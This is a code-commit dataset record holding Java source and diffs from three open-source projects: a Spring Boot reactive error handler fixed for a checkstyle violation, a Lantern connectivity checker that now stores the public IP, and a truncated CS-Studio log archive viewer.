HashSet<>(); exceptions.add("AbortedException"); exceptions.add("ClientAbortException"); exceptions.add("EOFException"); exceptions.add("EofException"); DISCONNECTED_CLIENT_EXCEPTIONS = Collections.unmodifiableSet(exceptions); } private static final Log logger = HttpLogging .forLogName(AbstractErrorWebExceptionHandler.class); private final ApplicationContext applicationContext; private final ErrorAttributes errorAttributes; private final ResourceProperties resourceProperties; private final TemplateAvailabilityProviders templateAvailabilityProviders; private List<HttpMessageReader<?>> messageReaders = Collections.emptyList(); private List<HttpMessageWriter<?>> messageWriters = Collections.emptyList(); private List<ViewResolver> viewResolvers = Collections.emptyList(); public AbstractErrorWebExceptionHandler(ErrorAttributes errorAttributes, ResourceProperties resourceProperties, ApplicationContext applicationContext) { Assert.notNull(errorAttributes, "ErrorAttributes must not be null"); Assert.notNull(resourceProperties, "ResourceProperties must not be null"); Assert.notNull(applicationContext, "ApplicationContext must not be null"); this.errorAttributes = errorAttributes; this.resourceProperties = resourceProperties; this.applicationContext = applicationContext; this.templateAvailabilityProviders = new TemplateAvailabilityProviders( applicationContext); } /** * Configure HTTP message writers to serialize the response body with. * @param messageWriters the {@link HttpMessageWriter}s to use */ public void setMessageWriters(List<HttpMessageWriter<?>> messageWriters) { Assert.notNull(messageWriters, "'messageWriters' must not be null"); this.messageWriters = messageWriters; } /** * Configure HTTP message readers to deserialize the request body with. * @param messageReaders the {@link HttpMessageReader}s to use */ public void setMessageReaders(List<HttpMessageReader<?>> messageReaders) { Assert.notNull(messageReaders, "'messageReaders' must not be null"); this.messageReaders = messageReaders; } /** * Configure the {@link ViewResolver} to use for rendering views. * @param viewResolvers the list of {@link ViewResolver}s to use */ public void setViewResolvers(List<ViewResolver> viewResolvers) { this.viewResolvers = viewResolvers; } /** * Extract the error attributes from the current request, to be used to populate error * views or JSON payloads. * @param request the source request * @param includeStackTrace whether to include the error stacktrace information * @return the error attributes as a Map. */ protected Map<String, Object> getErrorAttributes(ServerRequest request, boolean includeStackTrace) { return this.errorAttributes.getErrorAttributes(request, includeStackTrace); } /** * Extract the original error from the current request. * @param request the source request * @return the error */ protected Throwable getError(ServerRequest request) { return this.errorAttributes.getError(request); } /** * Check whether the trace attribute has been set on the given request. * @param request the source request * @return {@code true} if the error trace has been requested, {@code false} otherwise */ protected boolean isTraceEnabled(ServerRequest request) { String parameter = request.queryParam("trace").orElse("false"); return !"false".equalsIgnoreCase(parameter); } /** * Render the given error data as a view, using a template view if available or a * static HTML file if available otherwise. This will return an empty * {@code Publisher} if none of the above are available. * @param viewName the view name * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderErrorView(String viewName, ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { if (isTemplateAvailable(viewName)) { return responseBody.render(viewName, error); } Resource resource = resolveResource(viewName); if (resource != null) { return responseBody.body(BodyInserters.fromResource(resource)); } return Mono.empty(); } private boolean isTemplateAvailable(String viewName) { return this.templateAvailabilityProviders.getProvider(viewName, this.applicationContext) != null; } private Resource resolveResource(String viewName) { for (String location : this.resourceProperties.getStaticLocations()) { try { Resource resource = this.applicationContext.getResource(location); resource = resource.createRelative(viewName + ".html"); if (resource.exists()) { return resource; } } catch (Exception ex) { // Ignore } } return null; } /** * Render a default HTML "Whitelabel Error Page". * <p> * Useful when no other error view is available in the application. * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderDefaultErrorView( ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { StringBuilder builder = new StringBuilder(); Date timestamp = (Date) error.get("timestamp"); Object message = error.get("message"); Object trace = error.get("trace"); builder.append("<html><body><h1>Whitelabel Error Page</h1>").append( "<p>This application has no configured error view, so you are seeing this as a fallback.</p>") .append("<div id='created'>").append(timestamp).append("</div>") .append("<div>There was an unexpected error (type=") .append(htmlEscape(error.get("error"))).append(", status=") .append(htmlEscape(error.get("status"))).append(").</div>"); if (message != null) { builder.append("<div>").append(htmlEscape(message)).append("</div>"); } if (trace != null) { builder.append("<div style='white-space:pre-wrap;'>") .append(htmlEscape(trace)).append("</div>"); } builder.append("</body></html>"); return responseBody.syncBody(builder.toString()); } private String htmlEscape(Object input) { return (input != null) ? HtmlUtils.htmlEscape(input.toString()) : null; } @Override public void afterPropertiesSet() throws Exception { if (CollectionUtils.isEmpty(this.messageWriters)) { throw new IllegalArgumentException("Property 'messageWriters' is required"); } } /** * Create a {@link RouterFunction} that can route and handle errors as JSON responses * or HTML views. * <p> * If the returned {@link RouterFunction} doesn't route to a {@code HandlerFunction}, * the original exception is propagated in the pipeline and can be processed by other * {@link org.springframework.web.server.WebExceptionHandler}s. * @param errorAttributes the {@code ErrorAttributes} instance to use to extract error * information * @return a {@link RouterFunction} that routes and handles errors */ protected abstract RouterFunction<ServerResponse> getRoutingFunction( ErrorAttributes errorAttributes); @Override public Mono<Void> handle(ServerWebExchange exchange, Throwable throwable) { if (exchange.getResponse().isCommitted() || isDisconnectedClientError(throwable)) { return Mono.error(throwable); } this.errorAttributes.storeErrorInformation(throwable, exchange); ServerRequest request = ServerRequest.create(exchange, this.messageReaders); return getRoutingFunction(this.errorAttributes).route(request) .switchIfEmpty(Mono.error(throwable)) .flatMap((handler) -> handler.handle(request)) .doOnNext((response) -> logError(request, response, throwable)) .flatMap((response) -> write(exchange, response)); } private boolean isDisconnectedClientError(Throwable ex) { return DISCONNECTED_CLIENT_EXCEPTIONS.contains(ex.getClass().getSimpleName()) || isDisconnectedClientErrorMessage( NestedExceptionUtils.getMostSpecificCause(ex).getMessage()); } private boolean isDisconnectedClientErrorMessage(String message) { message = (message != null) ? message.toLowerCase() : ""; return (message.contains("broken pipe") || message.contains("connection reset by peer")); } private void logError(ServerRequest request, ServerResponse response, Throwable throwable) { if (logger.isDebugEnabled()) { logger.debug( request.exchange().getLogPrefix() + formatError(throwable, request)); } if (response.statusCode().equals(HttpStatus.INTERNAL_SERVER_ERROR)) { logger.error(request.exchange().getLogPrefix() + "500 Server Error for " + formatRequest(request), throwable); } } private String formatError(Throwable ex, ServerRequest request) { String reason = ex.getClass().getSimpleName() + ": " + ex.getMessage(); return "Resolved [" + reason + "] for HTTP " + request.methodName() + " " + request.path(); } private String formatRequest(ServerRequest request) { String rawQuery = request.uri().getRawQuery(); String query = StringUtils.hasText(rawQuery) ? "?" + rawQuery : ""; return "HTTP " + request.methodName() + " \"" + request.path() + query + "\""; } private Mono<? extends Void> write(ServerWebExchange exchange, ServerResponse response) { // force content-type since writeTo won't overwrite response header values exchange.getResponse().getHeaders() .setContentType(response.headers().getContentType()); return response.writeTo(exchange, new ResponseContext()); } private class ResponseContext implements ServerResponse.Context { @Override public List<HttpMessageWriter<?>> messageWriters() { return AbstractErrorWebExceptionHandler.this.messageWriters; } @Override public List<ViewResolver> viewResolvers() { return AbstractErrorWebExceptionHandler.this.viewResolvers; } } }
spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/reactive/error/AbstractErrorWebExceptionHandler.java
/* * Copyright 2012-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.boot.autoconfigure.web.reactive.error; import java.util.Collections; import java.util.Date; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Set; import org.apache.commons.logging.Log; import reactor.core.publisher.Mono; import org.springframework.beans.factory.InitializingBean; import org.springframework.boot.autoconfigure.template.TemplateAvailabilityProviders; import org.springframework.boot.autoconfigure.web.ResourceProperties; import org.springframework.boot.web.reactive.error.ErrorAttributes; import org.springframework.boot.web.reactive.error.ErrorWebExceptionHandler; import org.springframework.context.ApplicationContext; import org.springframework.core.NestedExceptionUtils; import org.springframework.core.io.Resource; import org.springframework.http.HttpLogging; import org.springframework.http.HttpStatus; import org.springframework.http.codec.HttpMessageReader; import org.springframework.http.codec.HttpMessageWriter; import org.springframework.util.Assert; import org.springframework.util.CollectionUtils; import org.springframework.util.StringUtils; import org.springframework.web.reactive.function.BodyInserters; import org.springframework.web.reactive.function.server.RouterFunction; import org.springframework.web.reactive.function.server.ServerRequest; import org.springframework.web.reactive.function.server.ServerResponse; import org.springframework.web.reactive.result.view.ViewResolver; import org.springframework.web.server.ServerWebExchange; import org.springframework.web.util.HtmlUtils; /** * Abstract base class for {@link ErrorWebExceptionHandler} implementations. * * @author Brian Clozel * @since 2.0.0 * @see ErrorAttributes */ public abstract class AbstractErrorWebExceptionHandler implements ErrorWebExceptionHandler, InitializingBean { /** * Currently duplicated from Spring WebFlux HttpWebHandlerAdapter. */ private static final Set<String> DISCONNECTED_CLIENT_EXCEPTIONS; static { Set<String> exceptions = new HashSet<>(); exceptions.add("AbortedException"); exceptions.add("ClientAbortException"); exceptions.add("EOFException"); exceptions.add("EofException"); DISCONNECTED_CLIENT_EXCEPTIONS = Collections.unmodifiableSet(exceptions); } private static final Log logger = HttpLogging .forLogName(AbstractErrorWebExceptionHandler.class); private final ApplicationContext applicationContext; private final ErrorAttributes errorAttributes; private final ResourceProperties resourceProperties; private final TemplateAvailabilityProviders templateAvailabilityProviders; private List<HttpMessageReader<?>> messageReaders = Collections.emptyList(); private List<HttpMessageWriter<?>> messageWriters = Collections.emptyList(); private List<ViewResolver> viewResolvers = Collections.emptyList(); public AbstractErrorWebExceptionHandler(ErrorAttributes errorAttributes, ResourceProperties resourceProperties, ApplicationContext applicationContext) { Assert.notNull(errorAttributes, "ErrorAttributes must not be null"); Assert.notNull(resourceProperties, "ResourceProperties must not be null"); Assert.notNull(applicationContext, "ApplicationContext must not be null"); this.errorAttributes = errorAttributes; this.resourceProperties = resourceProperties; this.applicationContext = applicationContext; this.templateAvailabilityProviders = new TemplateAvailabilityProviders( applicationContext); } /** * Configure HTTP message writers to serialize the response body with. * @param messageWriters the {@link HttpMessageWriter}s to use */ public void setMessageWriters(List<HttpMessageWriter<?>> messageWriters) { Assert.notNull(messageWriters, "'messageWriters' must not be null"); this.messageWriters = messageWriters; } /** * Configure HTTP message readers to deserialize the request body with. * @param messageReaders the {@link HttpMessageReader}s to use */ public void setMessageReaders(List<HttpMessageReader<?>> messageReaders) { Assert.notNull(messageReaders, "'messageReaders' must not be null"); this.messageReaders = messageReaders; } /** * Configure the {@link ViewResolver} to use for rendering views. * @param viewResolvers the list of {@link ViewResolver}s to use */ public void setViewResolvers(List<ViewResolver> viewResolvers) { this.viewResolvers = viewResolvers; } /** * Extract the error attributes from the current request, to be used to populate error * views or JSON payloads. * @param request the source request * @param includeStackTrace whether to include the error stacktrace information * @return the error attributes as a Map. */ protected Map<String, Object> getErrorAttributes(ServerRequest request, boolean includeStackTrace) { return this.errorAttributes.getErrorAttributes(request, includeStackTrace); } /** * Extract the original error from the current request. * @param request the source request * @return the error */ protected Throwable getError(ServerRequest request) { return this.errorAttributes.getError(request); } /** * Check whether the trace attribute has been set on the given request. * @param request the source request * @return {@code true} if the error trace has been requested, {@code false} otherwise */ protected boolean isTraceEnabled(ServerRequest request) { String parameter = request.queryParam("trace").orElse("false"); return !"false".equalsIgnoreCase(parameter); } /** * Render the given error data as a view, using a template view if available or a * static HTML file if available otherwise. This will return an empty * {@code Publisher} if none of the above are available. * @param viewName the view name * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderErrorView(String viewName, ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { if (isTemplateAvailable(viewName)) { return responseBody.render(viewName, error); } Resource resource = resolveResource(viewName); if (resource != null) { return responseBody.body(BodyInserters.fromResource(resource)); } return Mono.empty(); } private boolean isTemplateAvailable(String viewName) { return this.templateAvailabilityProviders.getProvider(viewName, this.applicationContext) != null; } private Resource resolveResource(String viewName) { for (String location : this.resourceProperties.getStaticLocations()) { try { Resource resource = this.applicationContext.getResource(location); resource = resource.createRelative(viewName + ".html"); if (resource.exists()) { return resource; } } catch (Exception ex) { // Ignore } } return null; } /** * Render a default HTML "Whitelabel Error Page". * <p> * Useful when no other error view is available in the application. * @param responseBody the error response being built * @param error the error data as a map * @return a Publisher of the {@link ServerResponse} */ protected Mono<ServerResponse> renderDefaultErrorView( ServerResponse.BodyBuilder responseBody, Map<String, Object> error) { StringBuilder builder = new StringBuilder(); Date timestamp = (Date) error.get("timestamp"); Object message = error.get("message"); Object trace = error.get("trace"); builder.append("<html><body><h1>Whitelabel Error Page</h1>").append( "<p>This application has no configured error view, so you are seeing this as a fallback.</p>") .append("<div id='created'>").append(timestamp).append("</div>") .append("<div>There was an unexpected error (type=") .append(htmlEscape(error.get("error"))).append(", status=") .append(htmlEscape(error.get("status"))).append(").</div>"); if (message != null) { builder.append("<div>").append(htmlEscape(message)).append("</div>"); } if (trace != null) { builder.append("<div style='white-space:pre-wrap;'>") .append(htmlEscape(trace)).append("</div>"); } builder.append("</body></html>"); return responseBody.syncBody(builder.toString()); } private String htmlEscape(Object input) { return (input != null) ? HtmlUtils.htmlEscape(input.toString()) : null; } @Override public void afterPropertiesSet() throws Exception { if (CollectionUtils.isEmpty(this.messageWriters)) { throw new IllegalArgumentException("Property 'messageWriters' is required"); } } /** * Create a {@link RouterFunction} that can route and handle errors as JSON responses * or HTML views. * <p> * If the returned {@link RouterFunction} doesn't route to a {@code HandlerFunction}, * the original exception is propagated in the pipeline and can be processed by other * {@link org.springframework.web.server.WebExceptionHandler}s. * @param errorAttributes the {@code ErrorAttributes} instance to use to extract error * information * @return a {@link RouterFunction} that routes and handles errors */ protected abstract RouterFunction<ServerResponse> getRoutingFunction( ErrorAttributes errorAttributes); @Override public Mono<Void> handle(ServerWebExchange exchange, Throwable throwable) { if (exchange.getResponse().isCommitted() || isDisconnectedClientError(throwable)) { return Mono.error(throwable); } this.errorAttributes.storeErrorInformation(throwable, exchange); ServerRequest request = ServerRequest.create(exchange, this.messageReaders); return getRoutingFunction(this.errorAttributes).route(request) .switchIfEmpty(Mono.error(throwable)) .flatMap((handler) -> handler.handle(request)) .doOnNext((response) -> logError(request, response, throwable)) .flatMap((response) -> write(exchange, response)); } private boolean isDisconnectedClientError(Throwable ex) { return DISCONNECTED_CLIENT_EXCEPTIONS.contains(ex.getClass().getSimpleName()) || isDisconnectedClientErrorMessage( NestedExceptionUtils.getMostSpecificCause(ex).getMessage()); } private boolean isDisconnectedClientErrorMessage(String message) { message = message != null ? message.toLowerCase() : ""; return (message.contains("broken pipe") || message.contains("connection reset by peer")); } private void logError(ServerRequest request, ServerResponse response, Throwable throwable) { if (logger.isDebugEnabled()) { logger.debug( request.exchange().getLogPrefix() + formatError(throwable, request)); } if (response.statusCode().equals(HttpStatus.INTERNAL_SERVER_ERROR)) { logger.error(request.exchange().getLogPrefix() + "500 Server Error for " + formatRequest(request), throwable); } } private String formatError(Throwable ex, ServerRequest request) { String reason = ex.getClass().getSimpleName() + ": " + ex.getMessage(); return "Resolved [" + reason + "] for HTTP " + request.methodName() + " " + request.path(); } private String formatRequest(ServerRequest request) { String rawQuery = request.uri().getRawQuery(); String query = StringUtils.hasText(rawQuery) ? "?" + rawQuery : ""; return "HTTP " + request.methodName() + " \"" + request.path() + query + "\""; } private Mono<? extends Void> write(ServerWebExchange exchange, ServerResponse response) { // force content-type since writeTo won't overwrite response header values exchange.getResponse().getHeaders() .setContentType(response.headers().getContentType()); return response.writeTo(exchange, new ResponseContext()); } private class ResponseContext implements ServerResponse.Context { @Override public List<HttpMessageWriter<?>> messageWriters() { return AbstractErrorWebExceptionHandler.this.messageWriters; } @Override public List<ViewResolver> viewResolvers() { return AbstractErrorWebExceptionHandler.this.viewResolvers; } } }
Fix checkstyle violation
spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/reactive/error/AbstractErrorWebExceptionHandler.java
Fix checkstyle violation
<ide><path>pring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/web/reactive/error/AbstractErrorWebExceptionHandler.java <ide> } <ide> <ide> private boolean isDisconnectedClientErrorMessage(String message) { <del> message = message != null ? message.toLowerCase() : ""; <add> message = (message != null) ? message.toLowerCase() : ""; <ide> return (message.contains("broken pipe") <ide> || message.contains("connection reset by peer")); <ide> }
Java
apache-2.0
f53ef362f32ed1531ce46ae04ebd977a4ae219ce
0
lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,getlantern/lantern-java,lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,lqch14102/lantern,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java,lqch14102/lantern,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java,getlantern/lantern-java
package org.lantern; import java.net.InetAddress; import java.util.TimerTask; import org.lantern.event.Events; import org.lantern.state.Connectivity; import org.lantern.state.Model; import org.lastbamboo.common.stun.client.PublicIpAddress; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.google.inject.Inject; public class ConnectivityChecker extends TimerTask { private static Logger LOG = LoggerFactory .getLogger(ConnectivityChecker.class); private final Model model; private boolean connected = false; @Inject ConnectivityChecker(final Model model) { this.model = model; } @Override public void run() { final InetAddress ip = new PublicIpAddress().getPublicIpAddress(); Connectivity connectivity = model.getConnectivity(); if (ip == null) { LOG.info("No IP -- possibly no internet connection"); if (connected) { connected = false; ConnectivityChangedEvent event = new ConnectivityChangedEvent(false, false, null); Events.asyncEventBus().post(event); } return; } String oldIp = connectivity.getIp(); String newIpString = ip.getHostAddress(); connectivity.setIp(newIpString); if (newIpString.equals(oldIp)) { if (!connected) { ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, true, ip); Events.asyncEventBus().post(event); connected = true; } } else { connected = true; ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, false, ip); Events.asyncEventBus().post(event); } } }
src/main/java/org/lantern/ConnectivityChecker.java
package org.lantern; import java.net.InetAddress; import java.util.TimerTask; import org.lantern.event.Events; import org.lantern.state.Connectivity; import org.lantern.state.Model; import org.lastbamboo.common.stun.client.PublicIpAddress; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import com.google.inject.Inject; public class ConnectivityChecker extends TimerTask { private static Logger LOG = LoggerFactory .getLogger(ConnectivityChecker.class); private final Model model; private boolean connected = false; @Inject ConnectivityChecker(final Model model) { this.model = model; } @Override public void run() { final InetAddress ip = new PublicIpAddress().getPublicIpAddress(); Connectivity connectivity = model.getConnectivity(); if (ip == null) { LOG.info("No IP -- possibly no internet connection"); if (connected) { connected = false; ConnectivityChangedEvent event = new ConnectivityChangedEvent(false, false, null); Events.asyncEventBus().post(event); } return; } String oldIp = connectivity.getIp(); String newIpString = ip.getHostAddress(); if (newIpString.equals(oldIp)) { if (!connected) { ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, true, ip); Events.asyncEventBus().post(event); connected = true; } } else { connected = true; ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, false, ip); Events.asyncEventBus().post(event); } } }
set model ip
src/main/java/org/lantern/ConnectivityChecker.java
set model ip
<ide><path>rc/main/java/org/lantern/ConnectivityChecker.java <ide> } <ide> String oldIp = connectivity.getIp(); <ide> String newIpString = ip.getHostAddress(); <add> connectivity.setIp(newIpString); <ide> if (newIpString.equals(oldIp)) { <ide> if (!connected) { <ide> ConnectivityChangedEvent event = new ConnectivityChangedEvent(true, true, ip);
Java
epl-1.0
592173f260539b4c8f7d3e34e11b2652b752cc0d
0
css-iter/cs-studio,ESSICS/cs-studio,ESSICS/cs-studio,ControlSystemStudio/cs-studio,css-iter/cs-studio,ESSICS/cs-studio,css-iter/cs-studio,ControlSystemStudio/cs-studio,ESSICS/cs-studio,css-iter/cs-studio,ControlSystemStudio/cs-studio,css-iter/cs-studio,ControlSystemStudio/cs-studio,ESSICS/cs-studio,css-iter/cs-studio,ESSICS/cs-studio,ControlSystemStudio/cs-studio,ControlSystemStudio/cs-studio,css-iter/cs-studio,ESSICS/cs-studio
/* * Copyright (c) 2006 Stiftung Deutsches Elektronen-Synchroton, * Member of the Helmholtz Association, (DESY), HAMBURG, GERMANY. * * THIS SOFTWARE IS PROVIDED UNDER THIS LICENSE ON AN "../AS IS" BASIS. * WITHOUT WARRANTY OF ANY KIND, EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR PARTICULAR PURPOSE AND * NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE * FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR * THE USE OR OTHER DEALINGS IN THE SOFTWARE. SHOULD THE SOFTWARE PROVE DEFECTIVE * IN ANY RESPECT, THE USER ASSUMES THE COST OF ANY NECESSARY SERVICING, REPAIR OR * CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. * NO USE OF ANY SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER. * DESY HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, * OR MODIFICATIONS. * THE FULL LICENSE SPECIFYING FOR THE SOFTWARE THE REDISTRIBUTION, MODIFICATION, * USAGE AND OTHER RIGHTS AND OBLIGATIONS IS INCLUDED WITH THE DISTRIBUTION OF THIS * PROJECT IN THE FILE LICENSE.HTML. IF THE LICENSE IS NOT INCLUDED YOU MAY FIND A COPY * AT HTTP://WWW.DESY.DE/LEGAL/LICENSE.HTM */ package org.csstudio.alarm.table; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.HashMap; import java.util.Observable; import java.util.Observer; import org.csstudio.alarm.dbaccess.ArchiveDBAccess; import org.csstudio.alarm.dbaccess.archivedb.ILogMessageArchiveAccess; import org.csstudio.alarm.table.dataModel.JMSMessage; import org.csstudio.alarm.table.dataModel.JMSMessageList; import org.csstudio.alarm.table.expertSearch.ExpertSearchDialog; import org.csstudio.alarm.table.internal.localization.Messages; import org.csstudio.alarm.table.logTable.JMSLogTableViewer; import org.csstudio.alarm.table.preferences.LogArchiveViewerPreferenceConstants; import org.csstudio.alarm.table.preferences.LogViewerPreferenceConstants; import org.csstudio.alarm.table.readDB.DBAnswer; import org.csstudio.alarm.table.readDB.ReadDBJob; import org.csstudio.platform.data.ITimestamp; import org.csstudio.platform.data.TimestampFactory; import org.csstudio.platform.model.IProcessVariable; import org.csstudio.util.time.StartEndTimeParser; import org.csstudio.util.time.swt.StartEndDialog; import org.eclipse.jface.preference.IPreferenceStore; import org.eclipse.swt.SWT; import org.eclipse.swt.events.SelectionAdapter; import org.eclipse.swt.events.SelectionEvent; import org.eclipse.swt.graphics.Color; import org.eclipse.swt.layout.GridData; import org.eclipse.swt.layout.GridLayout; import org.eclipse.swt.widgets.Button; import org.eclipse.swt.widgets.Composite; import org.eclipse.swt.widgets.Display; import org.eclipse.swt.widgets.Group; import org.eclipse.swt.widgets.Label; import org.eclipse.swt.widgets.Shell; import org.eclipse.swt.widgets.Text; import org.eclipse.ui.part.ViewPart; /** * Simple view more like console, used to write log messages. * * @author jhatje * @author $Author$ * @version $Revision$ * @since 19.07.2007 */ public class LogViewArchive extends ViewPart implements Observer { /** The Id of this Object. */ public static final String ID = LogViewArchive.class.getName(); /** The Parent Shell. */ private Shell _parentShell = null; /** The JMS message list. */ private JMSMessageList _jmsMessageList = null; /** The JMS Logtable Viewer. */ private JMSLogTableViewer _jmsLogTableViewer = null; /** An Array whit the name of the Columns. */ private String[] _columnNames; /** Textfield witch contain the "from time". */ private Text _timeFrom; /** Textfield witch contain the "to time". */ private Text _timeTo; /** The selectet "from time". */ private ITimestamp _fromTime; /** The selectet "to time". */ private ITimestamp _toTime; /** The column property change listener. */ private ColumnPropertyChangeListener _columnPropertyChangeListener; /** The default / last filter. */ private String _filter= ""; //$NON-NLS-1$ /** * The Answer from the DB. */ private DBAnswer _dbAnswer = null; /** The Display. */ private Display _disp; /** The count of results. */ private Label _countLabel; public LogViewArchive() { super(); _dbAnswer = new DBAnswer(); _dbAnswer.addObserver(this); } /** {@inheritDoc} */ public final void createPartControl(final Composite parent) { _disp = parent.getDisplay(); _columnNames = JmsLogsPlugin.getDefault().getPluginPreferences() .getString(LogArchiveViewerPreferenceConstants.P_STRINGArch) .split(";"); //$NON-NLS-1$ _jmsMessageList = new JMSMessageList(_columnNames); _parentShell = parent.getShell(); GridLayout grid = new GridLayout(); grid.numColumns = 1; parent.setLayout(grid); Composite comp = new Composite(parent, SWT.NONE); comp.setLayoutData(new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1)); comp.setLayout(new GridLayout(4, false)); Group buttons = new Group(comp, SWT.LINE_SOLID); buttons.setText(Messages.getString("LogViewArchive_period")); //$NON-NLS-1$ buttons.setLayout(new GridLayout(5, true)); GridData gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 300; buttons.setLayoutData(gd); create24hButton(buttons); create72hButton(buttons); createWeekButton(buttons); createFlexButton(buttons); createSearchButton(buttons); Group from = new Group(comp, SWT.LINE_SOLID); from.setText(Messages.getString("LogViewArchive_from")); //$NON-NLS-1$ gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 150; from.setLayoutData(gd); from.setLayout(new GridLayout(1, true)); _timeFrom = new Text(from, SWT.SINGLE); _timeFrom.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeFrom.setEditable(false); _timeFrom.setText(" "); //$NON-NLS-1$ Group to = new Group(comp, SWT.LINE_SOLID); to.setText(Messages.getString("LogViewArchive_to")); //$NON-NLS-1$ gd = new GridData(SWT.LEFT, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 150; to.setLayoutData(gd); to.setLayout(new GridLayout(1, true)); _timeTo = new Text(to, SWT.SINGLE); _timeTo.setLayoutData(new GridData(SWT.FILL,SWT.FILL,true,false,1,1)); _timeTo.setEditable(false); // timeTo.setText(" "); Group count = new Group(comp, SWT.LINE_SOLID); count.setText(Messages.getString("LogViewArchive_count")); //$NON-NLS-1$ count.setLayout(new GridLayout(1, true)); gd = new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1); gd.minimumHeight = 60; gd.minimumWidth = 75; count.setLayoutData(gd); _countLabel = new Label(count,SWT.RIGHT); gd = new GridData(SWT.FILL,SWT.CENTER,true, false,1,1); _countLabel.setLayoutData(gd); _countLabel.setText("0"); //$NON-NLS-1$ _jmsLogTableViewer = new JMSLogTableViewer(parent, getSite(), _columnNames, _jmsMessageList, 3,SWT.SINGLE | SWT.FULL_SELECTION); _jmsLogTableViewer.setAlarmSorting(false); parent.pack(); _columnPropertyChangeListener = new ColumnPropertyChangeListener( LogArchiveViewerPreferenceConstants.P_STRINGArch, _jmsLogTableViewer); JmsLogsPlugin.getDefault().getPluginPreferences() .addPropertyChangeListener(_columnPropertyChangeListener); } /** * Create a Button to selet the last 24 hour. * @param comp the parent Composite for the Button. */ private void create24hButton(final Composite comp) { Button b24hSearch = new Button(comp, SWT.PUSH); b24hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b24hSearch.setText(Messages.getString("LogViewArchive_day")); //$NON-NLS-1$ b24hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -24); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create the a Button to selet the last 72 hour. * @param comp the parent {@link Composite} for the Button. */ private void create72hButton(final Composite comp) { Button b72hSearch = new Button(comp, SWT.PUSH); b72hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false, 1, 1)); b72hSearch.setText(Messages.getString("LogViewArchive_3days")); //$NON-NLS-1$ b72hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { ILogMessageArchiveAccess adba = new ArchiveDBAccess(); GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -72); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); readDB.schedule(); } }); } /** * Create a Button to selet the last week. * @param comp the parent Composite for the Button. */ private void createWeekButton(final Composite comp) { Button b168hSearch = new Button(comp, SWT.PUSH); b168hSearch.setLayoutData(new GridData(SWT.FILL, SWT.FILL, true, false,1, 1)); b168hSearch.setText(Messages.getString("LogViewArchive_week")); //$NON-NLS-1$ b168hSearch.addSelectionListener(new SelectionAdapter() { public void widgetSelected(final SelectionEvent e) { GregorianCalendar to = new GregorianCalendar(); GregorianCalendar from = (GregorianCalendar) to.clone(); from.add(GregorianCalendar.HOUR_OF_DAY, -168); showNewTime(from, to); ReadDBJob readDB = new ReadDBJob("DB Reader", //$NON-NLS-1$ LogViewArchive.this._dbAnswer, from, to); 